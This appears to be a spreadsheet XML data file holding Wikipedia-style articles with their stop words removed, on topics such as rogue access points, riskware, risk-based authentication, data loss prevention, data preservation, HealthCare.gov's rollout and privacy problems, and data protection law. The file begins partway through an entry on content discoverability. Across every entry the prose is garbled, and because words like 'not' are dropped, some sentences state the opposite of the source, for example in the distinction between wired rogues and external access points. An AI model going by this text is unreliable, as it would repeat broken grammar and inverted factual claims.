channel channel ("channel surfing") shows appealed them, 2010s, video content consumers increasingly watching screens (either smart tvs, tablet computer screens smartphones) computerized search function often automated algorithm-created suggestions viewer. with search function, user enter name show, producer, actor, screenwriter genre help find content interest them. user using search engine smart device, device transmit information user's preferences previous online searches website. furthermore, 1980s, type brand television user watching affect his/her viewing habits. however, person searching shows 2010s different brands computerized smart probably different search results search term. limitations organizations trying maximal user uptake product, discoverability become important goal. however, achieving discovery automatically translate market success. example, hypothetical online game "xyz" easily discoverable, function mobile devices, video game perform well mobile game market, despite search results. well, even product functions, runs plays properly, well, users like product. case user like certain online product service, discoverability repeatable. user cannot find product service subsequent search, longer look product/service, instead shift substitute easily reliably findable. enough make online product service discoverable short period, unless goal create “viral content" part short-term marketing campaign. also findability information foraging service-oriented architecture wsdl references</t>
  </si>
  <si>
    <t>Rogue access point</t>
  </si>
  <si>
    <t>rogue access point wireless access point installed secure network without explicit authorization local network administrator, whether added well-meaning employee malicious attacker. dangers although technically easy well-meaning employee install "soft access point" inexpensive wireless router—perhaps make access mobile devices easier—it likely configure "open", poor security, potentially allow access unauthorized parties. attacker installs access point able various types vulnerability scanners, rather physically inside organization, attack remotely—perhaps reception area, adjacent building, park, high gain antenna, even several miles away. prevention detection prevent installation rogue access points, organizations install wireless intrusion prevention systems monitor radio spectrum unauthorized access points. presence large number wireless access points sensed airspace typical enterprise facility. these include managed access points secure network plus access points neighborhood. wireless intrusion prevention system facilitates auditing access points continuous basis learn whether rogue access points among them. order detect rogue access points, conditions need tested: whether access point managed access point list whether connected secure networkthe first conditions easy test—compare wireless address (also called bssid) access point managed access point bssid list. however, automated testing second condition become challenging light following factors: need cover different types access point devices bridging, (router), unencrypted wireless links, encrypted wireless links, different types relations wired wireless addresses access points, soft access points, necessity determine access point connectivity acceptable response time large networks, requirement avoid false positives negatives described below. false positives occur wireless intrusion prevention system detects access point actually connected secure network wired rogue. frequent false positives result wastage administrative bandwidth spent chasing them. possibility false positives also creates hindrance enabling automated blocking wired rogues fear blocking friendly neighborhood access point. false negatives occur wireless intrusion prevention system fails detect access point actually connected secure network wired rogue. false negatives result security holes. unauthorized access point found connected secure network, rogue access point first kind (also called “wired rogue”). hand, unauthorized access point found connected secure network, external access point. among external access points, found mischievous potential risk (e.g., whose settings attract already attracted secure network wireless clients), tagged rogue access point second kind, often called "evil twin". soft access point "soft access point" (soft wi-fi adapter using example windows' virtual wi-fi intel's wifi. this makes possible, without need physical wi-fi router, share wired network access computer wireless clients connected soft employee sets soft machine without coordinating department shares corporate network soft becomes rogue also man-in-the-middle attack wireless intrusion prevention system spoofing wireless wireless security legality piggybacking references external links roguescanner open source network based rogue access point detection wireless security curlie</t>
  </si>
  <si>
    <t>The Right to Read</t>
  </si>
  <si>
    <t>right read short story richard stallman, founder free software foundation, first published 1997 communications acm. cautionary tale year 2047, drm-like technologies employed restrict readership books; sharing books written material crime punishable imprisonment. particular, story touches impact system university students, need materials, (dan halbert) forced dilemma must decide whether loan computer fellow student (lissa lenz), would ability illegally access purchased documents. notable written digital rights management (drm) technology widespread (although video discs used appeared year before, various proprietary software since 1970s made form copy protection), predicting later hardware-based attempts restrict users could content, trusted computing. also digital imprimatur external links right read</t>
  </si>
  <si>
    <t>Riskware</t>
  </si>
  <si>
    <t>riskware, portmanteau risk software, word used describe software whose installation execution poses possible definite risk host computer. relatively normal programs often fall category riskware applications modified another purpose used computer user owner. also ransomware software cracking references external links riskware-kaspersky encyclopedia</t>
  </si>
  <si>
    <t>Risk-based authentication</t>
  </si>
  <si>
    <t>authentication, risk-based authentication non-static authentication system takes account profile address, user-agent http header, time access, agent requesting access system determine risk profile associated transaction. risk profile used determine complexity challenge. higher risk profiles leads stronger challenges, whereas static username/password suffice lower-risk profiles. risk-based implementation allows application challenge user additional credentials risk level appropriate. machine authentication often used risk based authentication machine authentication background customer additional authentication computer recognized. risk based authentication system, institution decides additional authentication necessary. risk deemed appropriate, enhanced authentication triggered, time password delivered band communication. risk based authentication also used session prompt additional authentication customer performs certain high risk transaction, money transfer address change. risk based authentication beneficial customer additional steps required something ordinary, login attempt machine.the point user validation accuracy improved without inconveniencing user risk-based authentication used major companies. criticism system computes risk profile diligently maintained updated threats emerge. improper configuration lead unauthorized access. user's connection profile (e.g. geolocation, connection type, keystroke dynamics, user behaviour) detected used compute risk profile. lack proper detection lead unauthorized access. also references http://www.google.com/patents/us20050097320</t>
  </si>
  <si>
    <t>Data loss prevention software</t>
  </si>
  <si>
    <t>data loss prevention (dlp) software detects potential data breaches/data ex-filtration transmissions prevents monitoring, detecting blocking sensitive data (endpoint actions), motion (network traffic), rest (data storage).the terms "data loss" "data leak" related often used interchangeably. data loss incidents turn data leak incidents cases media containing sensitive information lost subsequently acquired unauthorized party. however, data leak possible without losing data originating side. other terms associated data leakage prevention information leak detection prevention (ildp), information leak prevention (ilp), content monitoring filtering (cmf), information protection control (ipc) extrusion prevention system (eps), opposed intrusion prevention system. categories technological means employed dealing data leakage incidents divided categories: standard security measures, advanced/intelligent security measures, access control encryption designated systems, although latter category currently thought today. standard measures standard security measures, firewalls, intrusion detection systems (idss) antivirus software, commonly available products guard computers outsider insider attacks. firewall, example, prevents access outsiders internal network intrusion detection system detects intrusion attempts outsiders. inside attacks averted antivirus scans detect trojan horses send confidential information, thin clients operate client-server architecture personal sensitive data stored client device. advanced measures advanced security measures employ machine learning temporal reasoning algorithms detect abnormal access data (e.g., databases information retrieval systems) abnormal email exchange, honeypots detecting authorized personnel malicious intentions activity-based verification (e.g., recognition keystroke dynamics) user activity monitoring detecting abnormal data access. designated systems designated systems detect prevent unauthorized attempts copy send sensitive data, intentionally unintentionally, mainly personnel authorized access sensitive information. order classify certain information sensitive, mechanisms, exact data matching, structured data fingerprinting, statistical methods, rule regular expression matching, published lexicons, conceptual definitions, keywords contextual information source data. types network network (data motion) technology typically installed network egress points near perimeter. analyzes network traffic detect sensitive data sent violation information security policies. multiple security control points report activity analyzed central management server. endpoint endpoint (data use) systems internal end-user workstations servers. like network-based systems, endpoint-based technology address internal well external communications. therefore used control information flow groups types users (e.g. 'chinese walls'). they also control email instant messaging communications reach corporate archive, blocked communication (i.e., never sent, therefore subject retention rules) identified subsequent legal discovery situation. endpoint systems advantage monitor control access physical devices (such mobile devices data storage capabilities) cases access information encrypted. endpoint systems also access information needed provide contextual classification; example source author generating content. some endpoint-based systems provide application controls block attempted transmissions confidential information provide immediate user feedback. they must installed every workstation network (typically agent), cannot used mobile devices (e.g., cell phones pdas) cannot practically installed (for example workstation internet café). data identification includes techniques identifying confidential sensitive information. sometimes confused discovery, data identification process organizations technology determine look for. data classified either structured unstructured. structured data resides fixed fields within file spreadsheet, unstructured data refers free-form text media text documents, files video. estimated data unstructured structured. data loss protection (dlp) sometimes data distributor inadvertently advertently gives sensitive data third parties, uses authorized fashion. sometime later, data found unauthorized place (e.g., user's laptop). distributor must investigate source loss. data rest "data rest" specifically refers information moving, i.e. exists database file share. this information great concern businesses government institutions simply longer data left unused storage, likely might retrieved unauthorized individuals. protecting data involves methods access control, data encryption data retention policies. data "data use" refers data user currently interacting with. systems protect data in-use monitor flag unauthorized activities. these activities include screen-capture, copy/paste, print operations involving sensitive data. intentional unintentional attempts transmit sensitive data communication channels. data motion "data motion" data traversing network endpoint. networks internal external. systems protect data in-motion monitor sensitive data traveling across network various communication channels. also list backup software metadata removal tool endpoint detection response endpoint security references</t>
  </si>
  <si>
    <t>Data preservation</t>
  </si>
  <si>
    <t>data preservation conserving maintaining safety integrity data. preservation done formal activities governed policies, regulations strategies directed towards protecting prolonging existence authenticity data metadata. data described elements units knowledge information created, metadata summarizing subsets elements data; data data. main goal data preservation protect data lost destroyed contribute reuse progression data. history most historical data collected time lost destroyed. natural disasters combined lack materials necessary practices preserve protect data caused this. usually, important data sets saved, government records statistics, legal contracts economic transactions. scientific research doctoral theses data mostly destroyed improper storage lack data preservation awareness execution. over time, data preservation evolved generated importance awareness. many different ways preserve data many different important organizations involved first digital data preservation storage solutions appeared 1950s, usually flat hierarchically structured. while still issues solutions, made storing data much cheaper, easily accessible. 1970s relational databases well spreadsheets appeared. relational data bases structure data tables using structured query languages made efficient preceding storage solutions, spreadsheets hold high volumes numeric data applied relational databases produce derivative data. more recently, non-relational (non-structured query language) databases appeared complements relational databases hold high volumes unstructured semi-structured data. importance scope data preservation vast. everything governmental business records essentially represented data, amenable lost. this leads loss human history, perpetuity. data lost small independent scale whether personal data loss, data loss within businesses organizations, well larger national global scale negatively potentially permanently affect things environmental protection, medical research, homeland security, public health safety, economic development culture. mechanisms data loss also many varied, spanning disaster, wars, data breaches, negligence, simple forgetting natural decay. ways data collections used preserved stored properly seen u.s. geological survey, stores data collections natural hazards, natural resources, landscapes. data collected survey used federal state land management agencies towards land planning management, continually needs access historical reference data. contrast contrast, data holdings collections gathered data informally kept, necessarily prepared long-term preservation. example, collection back-up personal files. data holdings generally storage methods used past data lost environmental historical disasters.furthermore, data retention differs data preservation sense definition, retain object (data) hold keep possession object. preserve object protect, maintain keep future use. retention policies often circle around data deleted purpose well, held public access, preservation prioritizes permanence widely-shared access. thus, data preservation exceeds concept possessing data back copies data. data preservation ensures reliable access data including back-up recovery mechanisms precede event disaster technological change. methods digital digital preservation, similar data preservation, mainly concerned technological threats, solely digital data. essentially digital data formal activities enable ongoing persistent access digital data exceeding occurrence technological malfunction change. digital preservation aware inevitable change technology protocols, prepares data need accessible across types technologies platforms integrity data metadata conserved.technology, providing great process conserving data possible past, also changing quick rate digital data accessible anymore format incompatible software. without data preservation much existing digital data risk.the majority methods used towards data preservation today digital methods, effective methods exist. archives archives collection historical documents records. archives contribute work towards preservation data collecting data well organized, providing appropriate metadata confirm it.an example important data archive loni image data archive, archive collects data regarding clinical trials clinical research studies. catalogues, directories portals catalogues, directories portals consolidated resources kept individual institutions, associated data archives holdings. words, data presented site, instead might metadata aggregators, administer thorough inventories. repositories repositories places data archives holdings accessed stored. goal repositories make sure requirements protocols archives holdings met, data certified ensure data integrity user trust.single-site repositories repository holds data sets single site.an example major single-site repository data archiving networking services repository provides ongoing access digital research resources netherlands.multi-site repositories repository hosts data multiple institutional sites.an example well known multi-site repository openaire repository hosts research data publications collaborating countries more. openaire promotes open scholarship seeks improves discover-ability re-usability data.trusted digital repository repository seeks provide reliable, trusted access long period time. repository single multi-sited must cooperate reference model open archival information system, well adhere rules attributes contribute trust persistent financial responsibility, organizational buoyancy, administrative responsibility security safety.an example trusted digital repository digital repository ireland (dri) multi-site repository hosts ireland's humanity social science data sets. cyber infrastructures cyber infrastructures consists archive collections made available system hardware, technologies, software, policies, services tools. cyber infrastructures geared towards sharing data supporting peer-to-peer collaborations cultural community.an example major cyber-infrastructure canadian geo-spatial data infrastructure provides access spatial data canada. also data curation data recovery data refuge data retention arctic world archive references</t>
  </si>
  <si>
    <t>Data privacy on HealthCare.gov</t>
  </si>
  <si>
    <t>healthcare.gov health insurance exchange website operated united states federal government provisions affordable care aca, commonly referred “obamacare”, currently serves residents u.s. states opted create state exchanges. exchange facilitates sale private health insurance plans residents united states offers subsidies earn four times federal poverty line, earning less federal poverty line. website also assists persons eligible sign medicaid, separate marketplace small businesses. october 2013, healthcare.gov rolled planned, despite concurrent partial government shutdown. launch marred serious technological problems, making difficult public sign health insurance. deadline sign coverage would begin january 2014, december 2013, time problems largely fixed. open enrollment period 2016 coverage november 2015 january 2016. state exchanges also deadlines; performance varied.the design website overseen centers medicare medicaid services built number federal contractors, prominently group canada. original budget $93.7 million, grew $292 million prior launch website. while estimates overall cost building website reached $500 million prior launch early 2014 secretary sylvia mathews burwell said would "approximately $834 million marketplace-related contracts interagency agreements," office inspector general released report august 2014 finding total cost healthcare.gov website reached $1.7 billion month later, including costs beyond "computer systems," bloomberg news estimated $2.1 billion. july 2014, government accountability office released non-partisan study concluded administration provide "effective planning oversight practices" developing healthcare.gov website. background functionality site functions clearing house allow americans compare prices health insurance plans states, begin enrollment chosen plan, simultaneously find qualify government healthcare subsidies. visitors sign create specific user account first, listing personal information, receiving detailed information available area. designed assist millions uninsured americans, comparison shopping features involve visual format somewhat analogous websites amazon.com etsy.healthcare.gov also details medicaid options individuals. this relates expansion long-running program undertaken joint effort ppaca. congressional budget office (cbo) projected exchange would used estimated seven million americans obtain coverage first year launch; current estimates suggest combined figure slightly eight million. development history president barack obama signed affordable care (aca) march 2010 east room select audience nearly 300. stated health reform effort, designed long acrimonious debate facing fierce opposition u.s. congress expand health insurance coverage, based "the core principle everybody basic security comes health care". primary purpose increase coverage american people either public private insurance control healthcare costs. congressional budget office(cbo) estimated would reduce number uninsured million increasing coverage non-elderly citizens cent. insurers allowed deny insurance applicants pre-existing conditions. sunlight foundation stated least forty-seven private company contractors involved capacity fall 2013, measure causing wide variety policy changes. journalists writing york times called "the expansive social legislation enacted decades".a report reuters described healthcare.gov "key" reform measure. development website's interface well supporting back-end services, make sure website could work help people compare health insurance plans, outsourced private companies. front-end website developed startup development seed. back-end work contracted federal inc., subsidiary canadian multinational group, subcontracted work companies common large government contracts. also responsible building state-level healthcare exchanges, varying levels success (some open schedule). according author journalist john xenakis, federal's attempt massachusetts characterized complete failure. xenakis' view, despite massachusetts connector type website small team five could create months million dollar budget, team around million dollar budget failed. xenakis claims federal likely hired many incompetent programmers massachusetts transferring development contract another firm, optum inc. software created poor quality unusable optum, start scratch. also accused committing fraudulent tests reports charge oversight. similar problems occurred many states.according john xenakis, obama administration granted much money create federal individual state websites, large, unmanageable teams contained many incompetent programmers. also encouraged fraud overspending programmers.specifically, aspects healthcare.gov relating digital identity authentication assigned experian. quality software services, inc. (qssi) also played role. total number companies enlisted website's creation, names, disclosed department health human services. whole effort officially coordinated centers medicare medicaid services (cms), agency commentators journalists david perera sean gallagher speculated ill-suited task. social activist technologist clay johnson later said federal government issues come given "leans towards write-down-all-the-requirements-then-build-to-those-requirements type methodology" well suited current especially government contractors focused maximizing profits."the firms typically contracts firms good getting contracts, typically good executing them," alex howard, fellow harvard center democratic governance innovation, remarked verge evaluated back-end project. contrast, web-magazine's journalist adrianne jeffries praised successful "innovative" startup business front-end. however, found overall rollout "bone-headed".the obama administration repeatedly modified regulations policies summer 2013, meaning contractors deal changing requirements. however, changing requirements means unusual large, expensive custom software project; well-known factor historical project failures, methodologies agile software development developed cope them. unfortunately, regulations pertaining large government contracts many countries, including united states, good match agile software development. statistics analysis reuters news agency mid-october stated total contract-based cost building healthcare.gov swelled threefold initial estimate $93.7 million $292 million. august 2014, office inspector general released report finding cost healthcare.gov website reached $1.7 billion. pointed later commentators mark steyn, company already embroiled mid-2000s controversy contract payments. while devising canadian firearms registry, estimated costs million ballooned billion.on march 2019, centers medicare medicaid services reported 11.4 million americans selected enrolled automatically renewed exchange coverage 2019 open enrollment period. concerns website issues launch healthcare.gov website launched scheduled date october 2013. although government shutdown began day, healthcare.gov federal government websites remained open events. although appeared running normally, visitors quickly encountered numerous types technical problems, and, estimates, interested people able enroll site first week operations. even manage enroll, insurance providers later reported instances applications submitted site required information missing.in bloomberg businessweek journalist paul ford summed issue remarking, "regardless opinions health-care law, wrong make software." also wrote, meantime, it’s clear tens millions dollars spent launch something broken." consumerreports.org article re-iterated previous advice, group recommending people stay "away healthcare.gov least another month". group stated well, "hopefully long enough software vendors clean mess they've made."in third week operations, technical problems continued. cnn.com article highlighted "maddeningly long wait times" issue. variety problems included broken pull-down menus worked intermittently, example.todd park, u.s. chief technology officer, initially said october glitches caused unexpected high volume site drew 250,000 simultaneous users instead 50,000-60,000 expected. claimed site would worked fewer simultaneous users. more million people visited site october white house officials subsequently conceded issue volume, involved software systems design issues. example, consumers required create account able compare plans, registration process created bottleneck long wait times. also, stress tests done contractors launch date revealed site became slow 1,100 simultaneous users, nowhere near even 50,000-60,000 expected.despite later comments, concerns readiness exchanges raised march 2013, henry chao, deputy chief information officer centers medicare medicaid services (cms), said "let's make sure third-world experience". colleague his, gary cohen, also remarked, "everyone recognizes perfect." even 2011, awarded private sector contracts, ppaca regulations implementation measures still flux.the york times washington post reported november 2013 obama administration brought consulting firm mckinsey company assess website. their report, delivered march 2013, warned effort build healthcare.gov site falling behind risk failure unless immediate steps taken correct problems.on october 2013, president barack obama addressed technical problems issues thirty-minute press conference white house rose garden, saying excuse" them. remarked, "there's sugar coating: website slow, people getting stuck application process think fair nobody's frustrated am." also stated "tech surge" underway problems. president additionally pointed people could instead apply call center person.white house press secretary carney said time needed website working properly. carney also hinted problems remained unresolved long time prevented people meeting legal obligation obtain insurance time february deadline, legal penalty obtaining insurance would applicable obamacare states affordable care available, penalty payable.so, shortly healthcare.gov's launch, problems still affect legal requirement americans health insurance december remained books stated. however, october effective legal deadline applying health insurance healthcare.gov without getting penalty individual mandate extended march 2014, possibly problems healthcare.gov state healthcare exchanges (but without jure explanation given). obama administration appointed contractor, quality software services, (qssi), coordinate work fixing website problems. company already worked website's back-end website went live. stated before, prior launch, centers medicare medicaid services (cms) playing role coordinator, critics charged ill-suited systems integration role. administration appointed jeffrey zients adviser matter.on october zients promised, conference call media, site would working well "for vast majority users" november. also claimed visitors able complete account-creation process actually used healthcare.gov compare plans. perhaps largest issue faces, acknowledged call, error-riddled reports given insurers, often messing basic details individual's gender.as stated before, healthcare.gov problems persisted even weeks launch. example, networking failure error related data services killed website's functionality october this occurred exact health human services head kathleen sebelius highlighted design data government success. however, state-based exchanges mostly worked well registering individuals time period, cnn.com describing "largely error free".a large number technical fixes took place october november, npr.org report later remarking website seemed "working smoothly." yet, november obama administration revealed fewer 27,000 people signed private health insurance site. november 137,000 people obtained health insurance federal website. that figure represented strong increase, enrollment figures still vastly past u.s. government forecasts.accenture chosen replace group lead contractor website january 2014.a large issue future enrollments dealing accuracy healthcare.gov information sent insurance companies. stated npr.org article citing "continuing problems" healthcare.gov, enrollment notices contained significant error.a hacker broke part healthcare.gov insurance enrollment website july uploaded malicious software, according federal officials. 2015 open enrollment period enrollment 2015 year federal government website, serves states enrollment websites, started midnight 2014, ended february 2015. united states department health human services reported relatively smooth experience users. however, scattered reports problems, blocking login access long wait times, encountered. case call center worker told reporter resolving issue take five seven business days.in january today reported health plans offered counties 2015, average insurance premium increased less average annual jumps plans affordable care act, still large increases.state federal health care exchanges enrolled million people, numbers vary. florida accounted almost seventh people selected plans exchanges. texas, however, largest share uninsured adults enrollments lag. 2016 open enrollment period open enrollment period 2016 began november 2015 ended january 2016. fake websites before healthcare.gov went online, concern misleading fake websites state local level. early december 2013, third fake health insurance site shut kentucky. california democratic party politicians condemned california republican party-created website resembled state's official obamacare sign-up website provided political criticisms instead insurance coverage. privately-operated exchanges partly response healthcare.gov outages, number privately operated services launched provide tools consumers calculate subsidy eligibility, well research, compare, enroll plans examples include healthsherpa, stride health healthpocket. november 2013, healthsherpa launched team coders francisco received media attention comparative ease use. critics pointed focusing providing information, healthsherpa site resolve difficult problems, including allowing consumers actually enroll plan. stride health launched 2014, focused simplifying health care enrollment recommending plans users based data offering full service team phone help users enroll plans. company early success partnerships number large companies. march 2014, healthsherpa become full-service broker allowing users enroll directly healthsherpa site. security july 2014 hacker broke test server healthcare.gov uploaded malicious software. 2014 healthcare.gov apparently rewritten large portion site moved important functions "server-side," instead executed client-side user's browser. data privacy initial launch healthcare.gov plagued security concerns lead information security experts publicly testifying congressional committee science, space technology others speaking government security vulnerabilities healthcare.gov. david kennedy able locate 70,000 health records supposed private, publicly available google dork.there concerns personal information website secure users expect: january 2015 kevin counihan, c.e.o. healthcare.gov, addressed concerns privacy federal website. said launched review privacy policies, contracts third-party tools construction. said healthcare.gov encrypted contains data users’ income age, whether pregnant.on jan. 2015, associated press reported article titled: "government health care website quietly sharing personal data" healthcare.gov providing access enrollees' personal data private companies specialize advertising. data include age, income, code, whether person smokes, person pregnant. also include computer's internet address, identify person's name address combined information collected data brokers online advertising firms. there evidence data misused, connections dozens third-party tech firms documented. some companies also collecting highly specific information. copyright infringement october 2013, weekly standard reported site violating copyrights sprymedia, uk-based technology company, utilizing software copyright notices removed. software datatables, free open-source plugin jquery designed improve presentation data, dual-licensed version modified 3-clause license. healthcare.gov subsequently rectified license violation providing appropriate attribution, license copyright notices. reception possible ramifications technical problems heavily criticized, republican representatives sent president obama list questions, demanding explanations went wrong. some republicans called secretary health human services, kathleen sebelius, fired, oversaw planning site launch. former white house press secretary robert gibbs described technical problems "excruciatingly embarrassing", said people fired. scott amey project government oversight pointed development cost ceiling raised $93.7 million $292 million, asked: "where contract oversight?"american conservative commentators national review writers jonah goldberg mark steyn argued website's launch disaster presages larger problems throughout entire law, goldberg asserting "the republicans insisted monstrosity delayed looking little reasonable every passing tick." statement, republican national committee (rnc) responded president obama's comments "tech surge" code "spending surge" waste millions dollars. said statement also read, "the federal bureaucracy proven slow, bloated, incompetent, outdated manage america’s health care."speaker house john boehner, republican representative ohio, told reporters throughout november "more americans going lose health care going sign up." ohio governor john kasich stated nbc's meet press program october roll-out "got everybody shaking heads". also added seemed highly likely ohioans would healthcare.gov plans. kentucky governor steve beshear counter-argued website work well soon would since healthcare.gov represents "the future health care", commented well, "you know, advice would give news media critics take deep breath."the daily show host stewart notably lampooned healthcare.gov controversy interview sebelius. jokingly challenged online race: "i'm going download every movie ever made, going sign obamacare, we'll happens first." also faced grilling obama administration's opposition extended individual mandate delay.sebelius later said response criticism, "the majority people calling resign would people work want program work first place". also said, frequent conversations president committed role program running, that." popularity native kansas previously served governor, according university kansas political science professor burdett loomis, spurred stay on.u.s. house minority leader nancy pelosi, democratic representative california, commented controversy feels optimistic things fixed, saying faith technology" well "while glitches, solutions, well." democrats congress accused republican critics healthcare.gov acting faith. want process improve, we're interested torpedoing process," said representative xavier becerra, another democrat california chairman house democratic caucus.republican senator marco rubio drafted legislation result controversy delay individual mandate. proposed legislation drawn scattered democratic support. professor author victor lombardi commented bloomberg businessweek website's issues "don’t sound catastrophic", added history "may judge project catalyst revolutionized united states health-care system" remember hiccups launch."although decreed creation healthcare.gov divisive political speculation taken place, polling done gallup organization around time difficult roll-out still found majority americans support keeping least aspects obamacare. specifically, public favoured complete repeal. however, joint washington post news survey stated respondents consider website's problems harbinger problems health care measure.on october 2013, rep. terry ne-2) introduced exchange information disclosure (h.r. 3362; 113th congress). bill would require united states department health human services submit weekly reports congress many people using healthcare.gov signing health insurance. these reports would every monday march 2015 would available public. bill would "require weekly updates number unique website visitors, accounts, enrollments qualified health plan, well level coverage," separating data state. bill would also require reports efforts broken portions website. house scheduled vote january 2014.kathleen sebelius resigned secretary health human services april 2014. replaced sylvia mathews burwell june also centers medicare medicaid services ehealthinsurance health care united states health care reform united states health care reforms proposed obama administration health insurance coverage united states health insurance marketplace list failed overbudget custom software projects mythical man-month provisions patient protection affordable care united states department health human services references further reading "the secret startup that saved worst website america", atlantic, july 2015 external links official website hhs.gov/healthcare healthcare.gov sends personal data dozens tracking websites electronic frontier foundation, 2015</t>
  </si>
  <si>
    <t>Data protection officer</t>
  </si>
  <si>
    <t>data protection officer (dpo) ensures, independent manner, organization applies laws protecting individuals' personal data. designation, position tasks within organization described articles european union (eu) general data protection regulation (gdpr). many countries require appointment dpo, becoming prevalent privacy legislation. according gdpr, shall directly report highest management level. this mean directly managed level must direct access give advice senior managers making decisions personal data processing.the core responsibilities include ensuring his/her organization aware trained relevant gdpr obligations. additionally, must conduct audits ensure compliance, address potential issues proactively, liaison his/her organization public regarding data privacy matters.in germany, 2001 established requirement certain organizations included various protections around scope tenure role, including protections dismissal bringing problems attention management. many concepts incorporated drafting article gdpr continued incorporated privacy standards. references external links section data protection officer (dpo)</t>
  </si>
  <si>
    <t>Data protection</t>
  </si>
  <si>
    <t>information privacy relationship collection dissemination data, technology, public expectation privacy, legal political issues surrounding them. also known data privacy data protection. data privacy challenging since attempts data protecting individual's privacy preferences personally identifiable information. fields computer security, data security, information security design software, hardware, human resources address issue. authorities laws authorities country information types various types personal information often come privacy concerns. cable television this describes ability control information reveals oneself cable television, access information. example, third parties track programs someone watched given time. "the addition information broadcasting stream required audience rating survey, additional devices requested installed houses viewers listeners, without necessity cooperations, audience ratings automatically performed real-time." educational united kingdom 2012, education secretary michael gove described national pupil database "rich dataset" whose value could "maximised" making openly accessible, including private companies. kelly fiveash register said could mean child's school life including exam results, attendance, teacher assessments even characteristics" could available, third-party organizations responsible anonymizing publications themselves, rather data anonymized government handed over. example data request gove indicated rejected past, might possible improved version privacy regulations, "analysis sexual exploitation". financial information person's financial transactions, including amount assets, positions held stocks funds, outstanding debts, purchases sensitive. criminals gain access information person's accounts credit card numbers, person could become victim fraud identity theft. information person's purchases reveal great deal person's history, places he/she visited, he/she contacted with, products he/she used, his/her activities habits, medications he/she used. cases, corporations information target individuals marketing customized towards individual's personal preferences, person approve. internet ability control information reveals oneself internet, access information, become growing concern. these concerns include whether email stored read third parties without consent, whether third parties continue track websites someone visited. another concern websites visited collect, store, possibly share personally identifiable information users. advent various search engines data mining created capability data individuals collected combined wide variety sources easily. provided guidelines represent widely accepted concepts concerning fair information practices electronic marketplace called fair information practice principles. avoid giving away much personal information, emails encrypted. browsing pages well online activities done trace-less "anonymizers", case trusted, open-source distributed anonymizers, called nets, onion router. vpns (virtual private networks) another "anonymizer" used give someone protection online. this includes obfuscating encrypting traffic groups cannot mine it.email internet content privacy concerns. increasing amounts information online, social networking sites pose additional privacy challenges. people tagged photos valuable information exposed either choice unexpectedly others, referred participatory surveillance. data location also accidentally published, example, someone posts picture store background. caution exercised posting information online, social networks vary allow users make private remains publicly accessible. without strong security settings place careful attention remains public, person profiled searching collecting disparate pieces information, worst case leading cases cyberstalking reputation damage.cookies used websites users allow website retrieve information user's internet usually mention data retrieved common method used monitor track users' internet activity. 2018, general data protection regulation (gdpr) passed regulation forces websites visibly disclose consumers information privacy practices, referred cookie notices. this issued give consumers choice information behavior consent letting websites track, however effectiveness controversial. some websites engage deceptive practices placing cookie notices places page visible, giving consumers notice information tracked, allowing change privacy settings. locational location tracking capabilities mobile devices advancing (location-based services), problems related user privacy arise. location data among sensitive data currently collected. list potentially sensitive professional personal information could inferred individual knowing mobility trace published recently electronic frontier foundation. these include movements competitor sales force, attendance particular church individual's presence motel, abortion clinic. recent study montjoye showed four spatio-temporal points, approximate places times, enough uniquely identify million people mobility database. study shows constraints hold even resolution dataset low. therefore, even coarse blurred datasets provide little anonymity. medical people wish medical records revealed others confidentiality sensitivity information could reveal health. example, might concerned might affect insurance coverage employment. would wish others know medical psychological conditions treatments would bring embarrassment upon themselves. revealing medical data could also reveal details one's personal life. there three major categories medical privacy: informational (the degree control personal information), physical (the degree physical inaccessibility others), psychological (the extent doctor respects patients’ cultural beliefs, inner thoughts, values, feelings, religious practices allows make personal decisions). physicians psychiatrists many cultures countries standards doctor–patient relationships, include maintaining confidentiality. cases, physician–patient privilege legally protected. these practices place protect dignity patients, ensure patients feel free reveal complete accurate information required receive correct treatment. view united states' laws governing privacy private health information, hipaa hitech act. australian privacy 1988 australia well state-based health records legislation. political political privacy concern since voting systems emerged ancient times. secret ballot simplest widespread measure ensure political views known anyone voters themselves—it nearly universal modern democracy considered basic right citizenship. fact, even rights privacy exist, type privacy often does. unfortunately, several forms voting fraud privacy violations possible digital voting machines. legality legal protection right privacy general data privacy particular varies greatly around world.laws regulations related privacy data protection constantly changing, seen important keep abreast changes continually reassess compliance data privacy security regulations. within academia, institutional review boards function assure adequate measures taken ensure privacy confidentiality human subjects research.privacy concerns exist wherever personally identifiable information sensitive information collected, stored, used, finally destroyed deleted digital form otherwise. improper non-existent disclosure control root cause privacy issues. informed consent mechanisms including dynamic consent important communicating data subjects different uses personally identifiable information. data privacy issues arise response information wide range sources, healthcare records criminal justice investigations proceedings financial institutions transactions biological traits, genetic material residence geographic records privacy breach location-based service geolocation surfing behavior user preferences using persistent cookies academic research protection privacy information systems heterogeneous information systems differing privacy rules interconnected information shared, policy appliances required reconcile, enforce, monitor increasing amount privacy policy rules (and laws). there categories technology address privacy protection commercial systems: communication enforcement. policy communicationp3p platform privacy preferences. standard communicating privacy practices comparing preferences individuals.policy enforcementxacml extensible access control markup language together privacy profile standard expressing privacy policies machine-readable language software system enforce policy enterprise systems. epal enterprise privacy authorization language similar xacml, standard. ws-privacy "web service privacy" specification communicating privacy policy services. example, specify privacy policy information embedded soap envelope service message.protecting privacy interneton internet many users give away information themselves: unencrypted e-mails read administrators e-mail server connection encrypted https), also internet service provider parties sniffing network traffic connection able know contents. applies kind traffic generated internet, including browsing, instant messaging, others. order give away much personal information, e-mails encrypted browsing webpages well online activities done traceless anonymizers, open source distributed anonymizers, so-called networks. well-known open-source nets include anonymous network tor. improving privacy individualizationcomputer privacy improved individualization. currently security messages designed "average user", i.e. message everyone. researchers posited individualized messages security "nudges", crafted based users' individual differences personality traits, used improvements person's compliance computer security privacy. united states safe harbor program passenger name record issues united states department commerce created international safe harbor privacy principles certification program response 1995 directive data protection (directive 95/46/ec) european commission. both united states european union officially state committed upholding information privacy individuals, former caused friction failing meet standards eu's stricter laws personal data. negotiation safe harbor program was, part, address long-running issue. directive 95/46/ec declares chapter article personal data transferred countries european economic area countries provide adequate privacy protection. historically, establishing adequacy required creation national laws broadly equivalent implemented directive 95/46/eu. although exceptions blanket prohibition example disclosure country outside made consent relevant individual (article 26(1)(a)) limited practical scope. result, article created legal risk organisations transfer personal data europe united states. program regulates exchange passenger name record information according directive, personal data transferred third countries country provides adequate level protection. some exceptions rule provided, instance controller guarantee recipient comply data protection rules. european commission "working party protection individuals regard processing personal data," commonly known "article working party". working party gives advice level protection european union third countries.the working party negotiated u.s. representatives protection personal data, safe harbor principles result. notwithstanding approval, self-assessment approach safe harbor remains controversial number european privacy regulators commentators.the safe harbor program addresses issue following way: rather blanket imposed organisations united states, voluntary program enforced federal trade commission. u.s. organisations register program, self-assessed compliance number 